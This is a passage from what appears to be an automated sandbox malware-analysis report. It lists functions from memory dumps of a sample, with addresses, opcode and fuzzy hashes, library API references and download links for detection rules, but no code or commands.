Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: CaptureContextUnwindabort
String ID: @AK$pJ$pWF
API String ID: 747564614-629967855
Opcode ID: 1831905aabbcb49106925ec8ffcf6f3e64c9dc2dd67e9602a8998f0aacd40846
Instruction ID: 17fbac5d5d8852b919c936123b0673af4e140fa28ab62cf3bb638a3898ca5794
Opcode Fuzzy Hash: 1831905aabbcb49106925ec8ffcf6f3e64c9dc2dd67e9602a8998f0aacd40846
Instruction Fuzzy Hash: D9017832604B8080EB04DF22E95439D77A4E709FCCF088139CE881B759DFB9C08AC3A8

Uniqueness

Uniqueness Score: -1.00%

Function 03A8A270 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE

Download Yara Rule

Strings

<, xrefs: 03A8A92E
, xrefs: 03A8A923

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID:
String ID: $<
API String ID: 0-428540627
Opcode ID: 58dc9353a9a7517b3c72d3f02fcc31b8c3ec0016d5ec06511f190bbd9e753e9c
Instruction ID: 869fb979ee902d607a1e2d098b88687610b84b92bf8b9fd50a9968f144b86f31
Opcode Fuzzy Hash: 58dc9353a9a7517b3c72d3f02fcc31b8c3ec0016d5ec06511f190bbd9e753e9c
Instruction Fuzzy Hash: F692E2B2325A8087DB58CB1DE4A173AB7A5F3C8B84F44512AEB9B87794CE3CD551CB04

Uniqueness

Uniqueness Score: -1.00%

Function 004903D0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 004903DF

Strings

basic_string::append, xrefs: 0049040B, 00490440

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: wcslen
String ID: basic_string::append
API String ID: 4088430540-3811946249
Opcode ID: a7f5cd8f3dd5610e9dd408e08b8fa051ec40c9f12e38d6b3605767ff831a9d14
Instruction ID: d7f6b5b28c7dad5935aa04b534cc0f34484a6a95bea5a92c254868d2f6e18263
Opcode Fuzzy Hash: a7f5cd8f3dd5610e9dd408e08b8fa051ec40c9f12e38d6b3605767ff831a9d14
Instruction Fuzzy Hash: 71F036A176668092CD04AB77E8413689720935AFF4FA457339E3E277D1E928C593830D

Uniqueness

Uniqueness Score: -1.00%

Function 0048DB70 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0048DB7F

Strings

basic_string::append, xrefs: 0048DBAB, 0048DBE0

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: 850382e2369bd698f7f7abf6eb87690732c46a4f8311e9352445a6d6f5e3a05b
Instruction ID: b345a9f1aafbe2390870e03cef5765f8614811828a112452989b3d8c83368b40
Opcode Fuzzy Hash: 850382e2369bd698f7f7abf6eb87690732c46a4f8311e9352445a6d6f5e3a05b
Instruction Fuzzy Hash: 2CF090A2B5669481D904FA27DC9026D9320931BBF0F645F629D3E273E0DA1CC993830D

Uniqueness

Uniqueness Score: -1.00%

Function 00403A90 Relevance: 2.9, Strings: 2, Instructions: 395COMMON

Download Yara Rule

Strings

string literal, xrefs: 00403F84
std, xrefs: 00403DA6

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: std$string literal
API String ID: 0-2980153874
Opcode ID: 1aa18e65c20a417e6bf19e687fc133e83a86ff5874ff221a79d57955f6bcbee0
Instruction ID: 32252de1c59e0daa44844fb48fdc74f61d00508318ed0382edb4cfb44282d0e8
Opcode Fuzzy Hash: 1aa18e65c20a417e6bf19e687fc133e83a86ff5874ff221a79d57955f6bcbee0
Instruction Fuzzy Hash: 61D103B270574446DB308F16E48076B7BA9E744B8AF444137DF8A27BD2DB3DE6828748

Uniqueness

Uniqueness Score: -1.00%

Function 00412730 Relevance: 2.7, Strings: 2, Instructions: 228COMMON

Download Yara Rule

Strings

@, xrefs: 00412A3B
P, xrefs: 00412A31

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID: @$P
API String ID: 0-358147200
Opcode ID: 92d2f4d3ea2e0ca31011da7b0fba829294d3ecc23f2aa9f19575cf4403c44a1c
Instruction ID: 1db711f70b7797afdc2684a325324c633eac5ed2d28716328893ea24bb3d97e0
Opcode Fuzzy Hash: 92d2f4d3ea2e0ca31011da7b0fba829294d3ecc23f2aa9f19575cf4403c44a1c
Instruction Fuzzy Hash: 5371B37371564485DB249B29D2027EBA3A0FB50B98F58C117CB5987794EAFCC8E6C30E

Uniqueness

Uniqueness Score: -1.00%

Function 00490640 Relevance: 2.5, Strings: 2, Instructions: 33COMMON

Download Yara Rule

Strings

basic_string::assign, xrefs: 00490676
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00490680

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 2b74c8c9726c30fb73d5a6f8094fffa358ade557f595cbe1861103f5d9d5ea5f
Instruction ID: beda0bbe79210e2f5be04647366045220b3a6b9e364ab5f7b9cbe0dbd123cb86
Opcode Fuzzy Hash: 2b74c8c9726c30fb73d5a6f8094fffa358ade557f595cbe1861103f5d9d5ea5f
Instruction Fuzzy Hash: 1EF01DAAF01B8491DA10AF66D801689A761F39AF84F849517DE4C23324DB3CC5A6C748

Uniqueness

Uniqueness Score: -1.00%

Function 0048DDE0 Relevance: 2.5, Strings: 2, Instructions: 33COMMON

Download Yara Rule

Strings

basic_string::assign, xrefs: 0048DE16
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 0048DE20

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 195c1ea730c90cbad4a592d37e059ab7bda35ccc6f32f0af12937b447996f6c2
Instruction ID: 115fb130f023c5b97de099651033768a425d99435603f908d2c5308a7e210245
Opcode Fuzzy Hash: 195c1ea730c90cbad4a592d37e059ab7bda35ccc6f32f0af12937b447996f6c2
Instruction Fuzzy Hash: CCF030EAF01B84D1DA10EF66E84129DA361F359F84F859517DE4C13324DB3CC1A6C708

Uniqueness

Uniqueness Score: -1.00%

Function 0043CC50 Relevance: 1.9, APIs: 1, Instructions: 640COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 705412e760f0aa476e29a90850826390afde7955b53d468c83f36818f9ef67c4
Instruction ID: 403051ccc5ff3002004337ea95cb2bc54a14e7b8f8f14f3a6c1565946fd710ff
Opcode Fuzzy Hash: 705412e760f0aa476e29a90850826390afde7955b53d468c83f36818f9ef67c4
Instruction Fuzzy Hash: 34428432608B8086DB258F29F08036FBBA1F789B94F645517DBAA077A4DB7DC446CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0043B5B0 Relevance: 1.9, APIs: 1, Instructions: 638COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0043B8F6

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: 3c6faf41b29bed5c4deef8a9bf0e0c2c3c322628c6d495637b2c1e6c5804acca
Instruction ID: d4037d181b534a0750de57a5f0fd882d90249cd3af55ad2e72b108fe70123811
Opcode Fuzzy Hash: 3c6faf41b29bed5c4deef8a9bf0e0c2c3c322628c6d495637b2c1e6c5804acca
Instruction Fuzzy Hash: 1442E832208B8485DB25CF29E08036FBB61F789B54F246507EBDA47BA9CB7DC445CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0043C100 Relevance: 1.9, APIs: 1, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6cc56bcc5a2b960f8d2e4b77f1d8e62313b1a7381e0fb78291cb6a1efd8d0e
Instruction ID: 4c516f04ec8051e2ffea3a7b1561dd2bbdc5b32fc10c4f99e44f9fd337b090ca
Opcode Fuzzy Hash: 5e6cc56bcc5a2b960f8d2e4b77f1d8e62313b1a7381e0fb78291cb6a1efd8d0e
Instruction Fuzzy Hash: C142C232208B8485DB248F29E0C032FBB61F789B94F646517EBDA57BA4DB7DC485CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0043AA50 Relevance: 1.9, APIs: 1, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623c97dd420882a123d7785737d8aec5ce2d49467db69d8863ba1590529e6dec
Instruction ID: d5baa6caa7389bad78e77ce51aed17a2cbf6b2dddbe8d490307a69eda60bdf05
Opcode Fuzzy Hash: 623c97dd420882a123d7785737d8aec5ce2d49467db69d8863ba1590529e6dec
Instruction Fuzzy Hash: BC42E73220878086DB24CF29E08436FBBA1F789B54F246107EBDA07BA5DB7DC455CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0043D7C0 Relevance: 1.9, APIs: 1, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142ca02e5896585886605c18e120032246792e6f1208cb004de29b3da958c5bd
Instruction ID: 2842f13cfb2f90e8a0ee26f692bf543c8bb5981407aa769940a9c876ff88bb2d
Opcode Fuzzy Hash: 142ca02e5896585886605c18e120032246792e6f1208cb004de29b3da958c5bd
Instruction Fuzzy Hash: 3D42A232609B8086DB259F2AF04036FBBA1F789B54F245507EBAA077E5CB7DC485CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00439F00 Relevance: 1.9, APIs: 1, Instructions: 634COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0043A246

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: e185b7b70611007c5f74204fae8f9db4419965938b0173f8719a2a2ec4ecb8e6
Instruction ID: a4064709a1298d2897f66030c82a3b1c872e3a882748b3f0efbd8afcde40e376
Opcode Fuzzy Hash: e185b7b70611007c5f74204fae8f9db4419965938b0173f8719a2a2ec4ecb8e6
Instruction Fuzzy Hash: 1342D53224878085DB24CF29E08436FBB61F789B54F246507EBDA47BA4DB7DC895CB06

Uniqueness

Uniqueness Score: -1.00%

Function 0367D52F Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 0367D563

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _initp_misc_winsig
String ID:
API String ID: 2710132595-0
Opcode ID: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
Instruction ID: 0749f13352723f0f4bba03714ae397f9efb0ab43e56f93bd24fab8b30b91c02b
Opcode Fuzzy Hash: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
Instruction Fuzzy Hash: 6DA1B731619A098FEF54FF75EC98AAA37F2F3A8301321893A904AD7174DA7CD556CB40

Uniqueness

Uniqueness Score: -1.00%

Function 004417A0 Relevance: 1.8, APIs: 1, Instructions: 539COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00441A49

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: 219f33281dbcab5ede7639d5e0af08b5fe7ecd1bf679986a3c798dd05f63775b
Instruction ID: cc32cb735aa291d9a5578024c97b1152a3821c5885b77af54ab402a62d5fbbf0
Opcode Fuzzy Hash: 219f33281dbcab5ede7639d5e0af08b5fe7ecd1bf679986a3c798dd05f63775b
Instruction Fuzzy Hash: 4622C432209B8482EB24DB26E05036B7B61F781B98F640517EB9A07775DF7DC8C5D748

Uniqueness

Uniqueness Score: -1.00%

Function 00440600 Relevance: 1.8, APIs: 1, Instructions: 513COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0044093D

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: 7c2b936573c09a3928befcb5e41781ab3a64c57c68db665f8d979c315b5a5b83
Instruction ID: cb63427865c99854f913c49b2c00064720ba76e77fc8566abafbf1984d6f241b
Opcode Fuzzy Hash: 7c2b936573c09a3928befcb5e41781ab3a64c57c68db665f8d979c315b5a5b83
Instruction Fuzzy Hash: 5D120233608B8085FB21CB29E09036B7BA0F785798F244517DBDA47BA5DB7DC4A5CB09

Uniqueness

Uniqueness Score: -1.00%

Function 0043FD40 Relevance: 1.8, APIs: 1, Instructions: 512COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0044003B

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: memchr
String ID:
API String ID: 3297308162-0
Opcode ID: e798e747e514992a7cf52291272ffc597af7607587074e490895ad1f858dab2d
Instruction ID: 28bc8b5a3c36e07722a54dd5fcd59dde670bf5b0220a7dc7d1b883b106c0a7d3
Opcode Fuzzy Hash: e798e747e514992a7cf52291272ffc597af7607587074e490895ad1f858dab2d
Instruction Fuzzy Hash: 9C12E533608B8085EB25CB29E09432FBB61F786794F640127EBC947BA5DB7DC895CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0043EBA0 Relevance: 1.8, APIs: 1, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a698f284b53703fd530fda5ab09126f4af1d6364c0bed51ea3287997496fdf9b
Instruction ID: 6284a3d97b29246c0c35b9e44dfcfab35e79f36238c2806b320bf76ae57cb346
Opcode Fuzzy Hash: a698f284b53703fd530fda5ab09126f4af1d6364c0bed51ea3287997496fdf9b
Instruction Fuzzy Hash: 9412D73350978086DB24CB2AE09036F7BA0F789798F542127EBD9477A5DB7DC849CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00440F00 Relevance: 1.8, APIs: 1, Instructions: 507COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d8eeee4ecb0fc09407be5a17e352ebbdf2556d8a5c2b07f9ce8a3dd174d705
Instruction ID: 90782571574e5f94a9af0ed3e736fa6673638f7498f4ec7f9e5d1460141319af
Opcode Fuzzy Hash: 11d8eeee4ecb0fc09407be5a17e352ebbdf2556d8a5c2b07f9ce8a3dd174d705
Instruction Fuzzy Hash: A412B132208B9086FB218B69E05036FBB61F385798F644117DB9947BB9DB7DC8C5C709

Uniqueness

Uniqueness Score: -1.00%

Function 0043F490 Relevance: 1.8, APIs: 1, Instructions: 505COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 0043F788

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
